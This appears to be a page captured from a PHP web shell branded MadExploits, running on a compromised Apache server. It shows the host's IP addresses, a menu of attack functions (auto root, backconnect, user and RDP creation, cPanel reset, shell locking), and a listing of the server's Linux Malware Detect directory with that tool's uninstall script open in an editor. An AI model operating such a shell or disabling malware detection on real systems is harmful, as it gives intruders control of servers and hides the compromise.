Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.189.192.24
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
local /
maldetect.bk837687 /
[ HOME SHELL ]
Name
Size
Permission
Action
clean
[ DIR ]
drwxr-xr-x
cron
[ DIR ]
drwxr-xr-x
internals
[ DIR ]
drwxr-xr-x
logs
[ DIR ]
drwxr-xr-x
pub
[ DIR ]
drwxr-xr-x
quarantine
[ DIR ]
drwxr-x---
service
[ DIR ]
drwxr-xr-x
sess
[ DIR ]
drwxr-x---
sigs
[ DIR ]
drwxr-xr-x
sigs.old
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
CHANGELOG
47.91
KB
-rw-r--r--
COPYING.GPL
17.67
KB
-rw-r--r--
README
23.87
KB
-rw-r--r--
VERSION
6
B
-rw-r--r--
VERSION.hash
64
B
-rw-r--r--
conf.maldet
15.16
KB
-rw-r--r--
conf.maldet.cron
155
B
-rw-r--r--
event_log
61.42
KB
-rw-r--r--
hookscan.sh
702
B
-rwxr-xr-x
ignore_file_ext
0
B
-rw-r--r--
ignore_inotify
201
B
-rw-r--r--
ignore_paths
44
B
-rw-r--r--
ignore_sigs
0
B
-rw-r--r--
maldet
7.47
KB
-rwxr-xr-x
maldet.1.gz
3.94
KB
-rw-r--r--
modsec.sh
702
B
-rwxr-xr-x
monitor_paths
0
B
-rw-r--r--
uninstall.sh
1.54
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uninstall.sh
#!/usr/bin/env bash export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATH echo "This will completely remove Linux Malware Detect from your server including all quarantine data!" echo -n "Would you like to proceed? " read -p "[y/n] " -n 1 Z echo if [ "$Z" == "y" ] || [ "$Z" == "Y" ]; then if [ "$OSTYPE" != "FreeBSD" ]; then if test `cat /proc/1/comm` = "systemd" then systemctl disable maldet.service systemctl stop maldet.service rm -f /usr/lib/systemd/system/maldet.service systemctl daemon-reload else maldet -k if [ -f /etc/redhat-release ]; then /sbin/chkconfig maldet off /sbin/chkconfig maldet --del elif [ -f /etc/debian_version ] || [ -f /etc/lsb-release ]; then update-rc.d -f maldet remove elif [ -f /etc/gentoo-release ]; then rc-update del maldet default elif [ -f /etc/slackware-version ]; then rm -f /etc/rc.d/rc3.d/S70maldet rm -f /etc/rc.d/rc4.d/S70maldet rm -f /etc/rc.d/rc5.d/S70maldet else /sbin/chkconfig maldet off /sbin/chkconfig maldet --del fi rm -f /etc/init.d/maldet fi fi rm -rf /usr/local/maldetect* /etc/cron.d/maldet_pub /etc/cron.daily/maldet /usr/local/sbin/maldet /usr/local/sbin/lmd clamav_paths="/usr/local/cpanel/3rdparty/share/clamav/ /var/lib/clamav/ /var/clamav/ /usr/share/clamav/ /usr/local/share/clamav" for cpath in $clamav_paths; do rm -f $cpath/rfxn.* $cpath/lmd.user.* done echo "Linux Malware Detect has been uninstalled." else echo "You selected No or provided an invalid confirmation, nothing has been done!" fi
Close